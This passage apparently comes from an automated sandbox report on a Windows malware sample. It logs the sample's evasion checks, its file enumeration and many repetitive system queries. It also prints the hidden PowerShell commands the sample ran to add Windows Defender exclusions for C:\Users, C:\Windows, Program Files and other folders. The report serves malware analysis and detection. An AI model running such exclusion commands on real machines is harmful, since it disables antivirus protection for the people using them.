Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Reka\rapnewsa.exe | Evasive API call chain: CreateMutex, DecisionNodes, ExitProcess (graph_19-2494)
Source: C:\Reka\rapnewsa.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess (graph_19-2582)
Source: C:\Reka\rapnewsa.exe | System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6033
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3778
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7485
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1973
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8198
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1310
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8076
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1393
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7397
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2077
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7469
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2115
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8404
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1091
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6572 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1720 | Thread sleep count: 7485 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844 | Thread sleep count: 1973 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3168 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5796 | Thread sleep count: 8198 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5796 | Thread sleep count: 1310 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5660 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6520 | Thread sleep count: 8076 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472 | Thread sleep count: 1393 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1148 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228 | Thread sleep count: 7397 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3992 | Thread sleep count: 2077 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1432 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 928 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2696 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Reka\rapnewsa.exe | Code function: 19_2_00A48D40 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Reka\rapnewsa.exe | Code function: 19_2_00A48CA0 GetSystemInfo
Source: C:\Reka\rapnewsa.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
Source: C:\Reka\rapnewsa.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
Source: C:\Reka\rapnewsa.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
Source: C:\Reka\rapnewsa.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
Source: C:\Reka\rapnewsa.exe | File opened: C:\Users\user\AppData\Local\Adobe\
Source: C:\Reka\rapnewsa.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
Source: rapnewsa.exe, 00000013.00000002.2038436475.000000000118E000.00000004.00000020.00020000.00000000.sdmp, rapnewsa.exe, 00000013.00000002.2038436475.00000000011D6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: 1feP5qTCl0.exe, 00000000.00000002.2051703906.000001D8021E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
Source: C:\Reka\rapnewsa.exe | API call chain: ExitProcess graph end node (graph_19-2510)
Source: C:\Reka\rapnewsa.exe | API call chain: ExitProcess graph end node (graph_19-2504)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Reka\rapnewsa.exe | Process queried: DebugPort
Source: C:\Reka\rapnewsa.exe | Code function: 19_2_00A417E0 GlobalHandle,LoadLibraryA,GetProcAddress
Source: C:\Reka\rapnewsa.exe | Code function: 19_2_00A41A20 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Process created: C:\Reka\rapnewsa.exe C:\Reka\rapnewsa.exe
Source: C:\Reka\rapnewsa.exe | Code function: 19_2_00A48A80 cpuid
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
